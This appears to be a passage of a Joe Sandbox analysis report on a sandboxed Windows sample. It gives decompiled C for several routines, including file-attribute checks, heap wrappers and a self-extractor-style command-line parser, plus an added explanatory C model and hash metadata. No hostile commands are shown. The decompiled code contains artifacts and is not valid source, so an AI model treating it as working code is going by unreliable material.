• Instruction Fuzzy Hash: 1CF01CB1544B089E87718F7ACD10657BBE9EAA53A07100B2FD46ED21D0FB30A881DBA0
Uniqueness
Uniqueness Score: -1.00%
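E00964B60 indexes a global table at 0x968d60 with a stride of 0x18, which reads naturally as an array of 24-byte records whose fields sit at the offsets the function touches. The C model below is an added illustration, not code from the sample or from Joe Sandbox: the struct field names and roles are inferred from which offsets the routine reads, writes and hands to the close call, and are assumptions; the Windows close call is injected as a function pointer so all three paths run on any host. Decompilers commonly label the CloseHandle export address as FindCloseChangeNotification because both names resolve to the same entry point in kernelbase.dll, so the model treats the call as CloseHandle; that reading is also an assumption.

```c
/*
 * Added illustration (not from the sample or Joe Sandbox): a C model of the
 * 0x18-byte-per-entry handle table that E00964B60 walks with `_a4 * 0x18`.
 * Field names/roles are inferred from the decompiled offsets (assumptions).
 */
#include <stdint.h>

/* One 24-byte slot; offsets match the constants used in E00964B60. */
typedef struct {
    int32_t  closed;   /* +0x00 (0x968d60): set to 1 once closed           */
    int32_t  kind;     /* +0x04 (0x968d64): 1 = slot owns no OS handle     */
    int32_t  f8;       /* +0x08 (0x968d68): zeroed when kind == 1          */
    int32_t  fc;       /* +0x0c (0x968d6c): zeroed when kind == 1          */
    int32_t  f10;      /* +0x10 (0x968d70): zeroed when kind == 1          */
    uint32_t handle;   /* +0x14 (0x968d74): 32-bit HANDLE passed to close  */
} file_slot;
_Static_assert(sizeof(file_slot) == 0x18, "slot stride must match the sample's 0x18");

/* Stand-in for kernel32!CloseHandle (decompiled as FindCloseChangeNotification):
   nonzero on success, 0 on failure. Injected so the model runs off Windows. */
typedef int (*close_fn)(uint32_t handle);

/* Mirrors E00964B60: 0 on success, -1 (`_t9 | 0xffffffff`) if the close fails. */
int slot_close(file_slot *table, int idx, close_fn close_handle)
{
    file_slot *s = &table[idx];          /* base + idx * 0x18 */
    if (s->kind != 1) {
        if (!close_handle(s->handle))
            return -1;                   /* handle left marked open */
        s->closed = 1;
        return 0;
    }
    /* Pseudo-slot with no OS handle: just reset the bookkeeping fields. */
    s->closed = 1;
    s->f8  = 0;
    s->f10 = 0;
    s->fc  = 0;
    return 0;
}

/* Constructed test doubles (assumed behaviour, not real Windows calls). */
static int fake_close_ok(uint32_t h)   { (void)h; return 1; }
static int fake_close_fail(uint32_t h) { (void)h; return 0; }

/* Drives the three paths on a constructed table; returns how many behaved
   like E00964B60 (3 when all do). */
int slot_close_selftest(void)
{
    file_slot t[3] = {
        { 0, 0, 7, 7, 7, 0x1234 },   /* real handle, close succeeds */
        { 0, 0, 7, 7, 7, 0x5678 },   /* real handle, close fails    */
        { 0, 1, 7, 7, 7, 0      },   /* kind == 1, nothing to close */
    };
    int ok = 0;
    ok += (slot_close(t, 0, fake_close_ok) == 0
           && t[0].closed == 1 && t[0].f8 == 7);          /* fields untouched */
    ok += (slot_close(t, 1, fake_close_fail) == -1
           && t[1].closed == 0);                          /* still open */
    ok += (slot_close(t, 2, fake_close_ok) == 0
           && t[2].closed == 1 && t[2].f8 == 0
           && t[2].fc == 0 && t[2].f10 == 0);             /* bookkeeping reset */
    return ok;
}
```

The `_Static_assert` is the useful check when reading this kind of table: if a proposed struct does not come out at exactly the decompiled stride, the offsets in the rest of the function will not line up with the fields either.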

C-Code - Quality: 100%
E009666AE(CHAR* __ecx) {
	unsigned int _t1;

	_t1 = GetFileAttributesA(__ecx); // executed
	if(_t1 != 0xffffffff) {
		return  !(_t1 >> 4) & 0x00000001;
	} else {
		return 0;
	}
}

Decompiled line addresses: 0x009666b1, 0x009666ba, 0x009666c7, 0x009666bc, 0x009666be, 0x009666be
APIs
• GetFileAttributesA.KERNELBASE(?,00964777,?,00964E38,?), ref: 009666B1
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 5372f4eee9453ef900d19074713b8e10dd998e6b2dfeac3e4fd96688b1afd240
• Instruction ID: 4c62ad1978b9258d19ca4a31ea07b6ec33ee5b300dbde8646ec8597be38ca746
• Opcode Fuzzy Hash: 5372f4eee9453ef900d19074713b8e10dd998e6b2dfeac3e4fd96688b1afd240
• Instruction Fuzzy Hash: F7B0927A23A840426A200631BC295562845A7C223A7E41B94F032D01E0CA7EC856E404
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
			void* E00964CA0(long _a4) { // thin wrapper: allocate _a4 bytes from the process global heap
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed; flags 0 = GMEM_FIXED, returns the block pointer or NULL
				return _t2;
			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,?), ref: 00964CAA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                                                    • Opcode ID: 259c9b0d878409128af1a8e175560a6c5102a7e3df3e7baabe4c221844c41d4e
                                                                                                                                                                                                                                    • Instruction ID: 7c22f9da57c520dd7b9aed7677647cd817477971c3079781bd9d8edcb62a7c9b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 259c9b0d878409128af1a8e175560a6c5102a7e3df3e7baabe4c221844c41d4e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AB0123204D20CB7CF001FC2EC09F853F1DE7C5771F140000F60C450508AB294109A96
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
			void* E00964CC0(void* _a4) { // thin wrapper: release a block obtained from GlobalAlloc
				void* _t2;

				_t2 = GlobalFree(_a4); // executed; returns NULL on success, the handle itself on failure
				return _t2;
			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                                                                                                                    • Opcode ID: f70885694d8bf0765d3276675922ecafb69c8fbdb57e315241b14258e4774367
                                                                                                                                                                                                                                    • Instruction ID: be155006c1d6e7effd68a3451942761c4a279984c39e4827c3f9fbe9f6169489
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f70885694d8bf0765d3276675922ecafb69c8fbdb57e315241b14258e4774367
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3B0123100410CB78F001B42EC088453F1DD6C12707000010F50C410218B7398119985
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E00965C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				CHAR* _v265;
                                                                                                                                                                                                                                    				char _v266;
                                                                                                                                                                                                                                    				char _v267;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				CHAR* _v272;
                                                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                                                    				char _v556;
                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                                                    				CHAR* _t69;
                                                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    				char _t79;
                                                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                                                    				intOrPtr _t105;
                                                                                                                                                                                                                                    				void* _t111;
                                                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                                                    				void* _t119;
                                                                                                                                                                                                                                    				void* _t127;
                                                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                                                    				void* _t132;
                                                                                                                                                                                                                                    				void* _t142;
                                                                                                                                                                                                                                    				signed int _t143;
                                                                                                                                                                                                                                    				CHAR* _t144;
                                                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                                                    				void* _t146;
                                                                                                                                                                                                                                    				void* _t147;
                                                                                                                                                                                                                                    				void* _t149;
                                                                                                                                                                                                                                    				char _t155;
                                                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                                                    				void* _t162;
                                                                                                                                                                                                                                    				void* _t163;
                                                                                                                                                                                                                                    				char _t167;
                                                                                                                                                                                                                                    				char _t170;
                                                                                                                                                                                                                                    				CHAR* _t173;
                                                                                                                                                                                                                                    				void* _t177;
                                                                                                                                                                                                                                    				intOrPtr* _t183;
                                                                                                                                                                                                                                    				intOrPtr* _t192;
                                                                                                                                                                                                                                    				CHAR* _t199;
                                                                                                                                                                                                                                    				void* _t200;
                                                                                                                                                                                                                                    				CHAR* _t201;
                                                                                                                                                                                                                                    				void* _t205;
                                                                                                                                                                                                                                    				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x968004; // 0xf4cc89a0
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00966CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00966E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x968004; // 0xf4cc89a0
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0096597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E009644B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x969124 = E00966285();
									_t75 = 0;
								}
								return E00966CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E009644B9(0, 0x521, 0x961140, 0, 0x40, 0);
												_t85 =  *0x968588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                    														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                    														_t202 = _t50;
                                                                                                                                                                                                                                    														do {
                                                                                                                                                                                                                                    															_t88 =  *_t183;
                                                                                                                                                                                                                                    															_t183 = _t183 + 1;
                                                                                                                                                                                                                                    														} while (_t88 != 0);
                                                                                                                                                                                                                                    														if(_t183 == _t202) {
                                                                                                                                                                                                                                    															goto L49;
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															_t205 = 0x5b;
                                                                                                                                                                                                                                    															if(E0096667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                    																L115:
                                                                                                                                                                                                                                    																_t206 = 0x5d;
                                                                                                                                                                                                                                    																if(E0096667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                    																	L117:
                                                                                                                                                                                                                                    																	_t202 =  &_v276;
                                                                                                                                                                                                                                    																	_v276 = _t167;
                                                                                                                                                                                                                                    																	if(E00965C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		_t202 = 0x104;
                                                                                                                                                                                                                                    																		E00961680(0x968c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	_t202 = 0x5b;
                                                                                                                                                                                                                                    																	if(E0096667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		goto L117;
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																_t202 = 0x5d;
                                                                                                                                                                                                                                    																if(E0096667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                    																	goto L49;
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	goto L115;
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													 *0x968a24 = 1;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L50;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_t100 = _t87 - 1;
                                                                                                                                                                                                                                    												if(_t100 == 0) {
                                                                                                                                                                                                                                    													L98:
                                                                                                                                                                                                                                    													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                    														goto L49;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                    														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                    														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                    														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                    														_t202 = _t38;
                                                                                                                                                                                                                                    														do {
                                                                                                                                                                                                                                    															_t101 =  *_t192;
                                                                                                                                                                                                                                    															_t192 = _t192 + 1;
                                                                                                                                                                                                                                    														} while (_t101 != 0);
                                                                                                                                                                                                                                    														if(_t192 == _t202) {
                                                                                                                                                                                                                                    															goto L49;
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															_t202 =  &_v276;
                                                                                                                                                                                                                                    															_v276 = _t170;
                                                                                                                                                                                                                                    															if(E00965C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                    																goto L49;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                    																_t218 = 0x968b3e;
                                                                                                                                                                                                                                    																_t105 = _v276;
                                                                                                                                                                                                                                    																if(_t104 != 0x54) {
                                                                                                                                                                                                                                    																	_t218 = 0x968a3a;
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    																E00961680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                    																_t202 = 0x104;
                                                                                                                                                                                                                                    																E0096658A(_t218, 0x104, 0x961140);
                                                                                                                                                                                                                                    																if(E009631E0(_t218) != 0) {
                                                                                                                                                                                                                                    																	goto L50;
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	goto L106;
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                    													if(_t111 == 0) {
                                                                                                                                                                                                                                    														if(_v266 != 0) {
                                                                                                                                                                                                                                    															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                    																goto L49;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																_t199 = _v265;
                                                                                                                                                                                                                                    																if(_t199 != 0) {
                                                                                                                                                                                                                                    																	_t219 =  &_v265;
                                                                                                                                                                                                                                    																	do {
                                                                                                                                                                                                                                    																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                    																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                    																		if(_t115 == 0) {
                                                                                                                                                                                                                                    																			 *0x968a2c = 1;
                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                    																			_t200 = 2;
                                                                                                                                                                                                                                    																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                    																			if(_t119 == 0) {
                                                                                                                                                                                                                                    																				 *0x968a30 = 1;
                                                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                                                    																				if(_t119 == 0xf) {
																				*0x968a34 = 1;
																			} else {
																				_t209 = 0;
																			}
																		}
																	}
																	_t118 = *_t219;
																	_t199 = _t118;
																} while (_t118 != 0);
															}
														}
													} else {
														*0x968a2c = 1;
													}
													goto L50;
												} else {
													_t127 = _t111 - 3;
													if(_t127 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) { /* 0x3a == ':' */
																goto L49;
															} else {
																/* CharUpperA on a single character (high word zero) returns that character upper-cased */
																_t129 = CharUpperA(_v265);
																if(_t129 == 0x31) { /* '1' */
																	goto L76;
																} else {
																	if(_t129 == 0x41) { /* 'A' */
																		goto L83;
																	} else {
																		if(_t129 == 0x55) { /* 'U' */
																			goto L76;
																		} else {
																			goto L49;
																		}
																	}
																}
															}
														} else {
															L76:
															_push(2);
															_pop(1);
															L83:
															*0x968a38 = 1;
														}
														goto L50;
													} else {
														_t132 = _t127 - 1;
														if(_t132 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) { /* ':' */
																	/* 0x7f == LOCALE_INVARIANT, 1 == NORM_IGNORECASE, -1 == NUL-terminated strings.
																	   CompareStringA returns 0 only on failure; an equal match is CSTR_EQUAL (2),
																	   so as rendered this test is "call succeeded", not "strings equal". */
																	if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff, &_v267, 0xffffffff) != 0) {
																		goto L49;
																	}
																} else {
																	_t201 = _v265;
																	*0x969a2c = 1;
																	if(_t201 != 0) {
																		_t220 = &_v265;
																		do {
																			_t220 = _t220 + 1;
																			_t142 = CharUpperA(_t201) - 0x41; /* offset of the upper-cased character from 'A' */
																			if(_t142 == 0) { /* 'A' */
																				_t143 = 2;
																				*0x969a2c = *0x969a2c | _t143;
																				goto L70;
																			} else {
																				_t145 = _t142 - 3;
																				if(_t145 == 0) { /* 'D' */
																					*0x968d48 = *0x968d48 | 0x00000040;
																				} else {
																					_t146 = _t145 - 5;
																					if(_t146 == 0) { /* 'I' */
																						*0x969a2c = *0x969a2c & 0xfffffffd;
																						goto L70;
																					} else {
																						_t147 = _t146 - 5;
																						if(_t147 == 0) { /* 'N' */
																							*0x969a2c = *0x969a2c & 0xfffffffe;
																							goto L70;
																						} else {
																							/* As rendered, _t149 == _t147, so the following == 0 test can never be
																							   true on this path; this is a decompiler artifact, not program logic. */
																							_t149 = _t147;
																							if(_t149 == 0) {
																								*0x968d48 = *0x968d48 | 0x00000080;
																							} else {
																								if(_t149 == 3) {
																									*0x969a2c = *0x969a2c | 0x00000004;
																									L70:
																									*0x968a28 = 1;
																								} else {
																									_t209 = 0;
																								}
																							}
																						}
																					}
																				}
																			}
																			_t144 = *_t220;
																			_t201 = _t144;
																		} while (_t144 != 0);
																	}
																}
															} else {
																*0x969a2c = 3;
																*0x968a28 = 1;
															}
															goto L50;
														} else {
															if(_t132 == 0) {
																goto L98;
															} else {
																L49:
																_t209 = 0;
																L50:
																_t173 = _v272;
																if( *_t173 != 0) {
																	goto L2;
																} else {
																	break;
																}
															}
														}
													}
												}
											}
										}
									} else {
										goto L106;
									}
								} else {
									L34:
									_t209 = 0;
									break;
								}
							}
						}
					}
					goto L131;
				}
				if( *0x968a2c != 0 && *0x968b3e == 0) {
					/* 0x104 == MAX_PATH; a zero return from GetModuleFileNameA means failure */
					if(GetModuleFileNameA( *0x969a3c, 0x968b3e, 0x104) == 0) {
						_t209 = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t202 = 0x5c;
                                                                                                                                                                                                                                    							 *((char*)(E009666C8(0x968b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t63 = _t209;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L131:
                                                                                                                                                                                                                                    			}
0x00965c9e
0x00965ca9
0x00965cb0
0x00965cb3
0x00965cb6
0x00965cb7
0x00965cb8
0x00965cbd
0x00966204
0x00965ccb
0x00000000
0x00965ccb
0x00965cd3
0x00965cd7
0x00965cf4
0x00000000
0x00965cf4
0x00965cf8
0x00965d00
0x00000000
0x00965d06
0x00965d06
0x00965d0e
0x00965d10
0x00965d12
0x00965d14
0x00965d15
0x00965d17
0x00965d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00965d19
0x00965d19
0x00965d1d
0x00000000
0x00965d3f
0x00965d3f
0x00965d4b
0x00965d4b
0x00965d4f
0x00965d8d
0x00000000
0x00965d93
0x00965d93
0x00965d9a
0x00965d9d
0x00965d9e
0x00000000
0x00965d9e
0x00965d51
0x00965d5b
0x00965d72
0x009660fb
0x009660fb
0x00966207
0x0096620a
0x0096620b
0x0096620e
0x00966217
0x00965d78
0x00965d78
0x00965d80
0x00965d83
0x00965d84
0x00000000
0x00965d84
0x00965d5d
0x00965d5f
0x00965d62
0x00965d68
0x00965d64
0x00965d64
0x00965d64
0x00000000
0x00965d62
0x00965d5b
0x00965d4f
0x00965d1d
0x00000000
0x00965d9f
0x00965d9f
0x00965da5
0x00965dab
0x00965dba
0x00966218
0x0096621d
0x00966220
0x00966221
0x00966229
0x00966230
0x00966247
0x0096626a
0x00966272
0x00966249
0x00966255
0x0096625f
0x00966264
0x00966264
0x00966284
0x00965dc0
0x00965dc0
0x00965dca
0x00965e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00965dcc
0x00965dce
0x00965e24
0x00965e24
0x00965e2c
0x00965e47
0x00965e4a
0x009661d2
0x009661e2
0x009661e7
0x009661ee
0x009661f1
0x009661f1
0x009661f8
0x009661f8
0x00965e50
                                                                                                                                                                                                                                    0x00965e53
                                                                                                                                                                                                                                    0x00966109
                                                                                                                                                                                                                                    0x0096611f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966125
                                                                                                                                                                                                                                    0x00966137
                                                                                                                                                                                                                                    0x0096613a
                                                                                                                                                                                                                                    0x0096613c
                                                                                                                                                                                                                                    0x0096613e
                                                                                                                                                                                                                                    0x0096613e
                                                                                                                                                                                                                                    0x00966141
                                                                                                                                                                                                                                    0x00966141
                                                                                                                                                                                                                                    0x00966143
                                                                                                                                                                                                                                    0x00966144
                                                                                                                                                                                                                                    0x0096614a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966150
                                                                                                                                                                                                                                    0x00966152
                                                                                                                                                                                                                                    0x0096615c
                                                                                                                                                                                                                                    0x00966170
                                                                                                                                                                                                                                    0x00966172
                                                                                                                                                                                                                                    0x0096617c
                                                                                                                                                                                                                                    0x00966190
                                                                                                                                                                                                                                    0x00966190
                                                                                                                                                                                                                                    0x00966196
                                                                                                                                                                                                                                    0x009661a5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009661ab
                                                                                                                                                                                                                                    0x009661b9
                                                                                                                                                                                                                                    0x009661c6
                                                                                                                                                                                                                                    0x009661c6
                                                                                                                                                                                                                                    0x0096617e
                                                                                                                                                                                                                                    0x00966180
                                                                                                                                                                                                                                    0x0096618a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096618a
                                                                                                                                                                                                                                    0x0096615e
                                                                                                                                                                                                                                    0x00966160
                                                                                                                                                                                                                                    0x0096616a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096616a
                                                                                                                                                                                                                                    0x0096615c
                                                                                                                                                                                                                                    0x0096614a
                                                                                                                                                                                                                                    0x0096610b
                                                                                                                                                                                                                                    0x0096610e
                                                                                                                                                                                                                                    0x0096610e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965e59
                                                                                                                                                                                                                                    0x00965e59
                                                                                                                                                                                                                                    0x00965e5c
                                                                                                                                                                                                                                    0x0096604f
                                                                                                                                                                                                                                    0x00966056
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096605c
                                                                                                                                                                                                                                    0x0096606e
                                                                                                                                                                                                                                    0x00966071
                                                                                                                                                                                                                                    0x00966073
                                                                                                                                                                                                                                    0x00966075
                                                                                                                                                                                                                                    0x00966075
                                                                                                                                                                                                                                    0x00966078
                                                                                                                                                                                                                                    0x00966078
                                                                                                                                                                                                                                    0x0096607a
                                                                                                                                                                                                                                    0x0096607b
                                                                                                                                                                                                                                    0x00966081
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966087
                                                                                                                                                                                                                                    0x00966087
                                                                                                                                                                                                                                    0x0096608d
                                                                                                                                                                                                                                    0x0096609c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009660a2
                                                                                                                                                                                                                                    0x009660aa
                                                                                                                                                                                                                                    0x009660b2
                                                                                                                                                                                                                                    0x009660b7
                                                                                                                                                                                                                                    0x009660bd
                                                                                                                                                                                                                                    0x009660bf
                                                                                                                                                                                                                                    0x009660bf
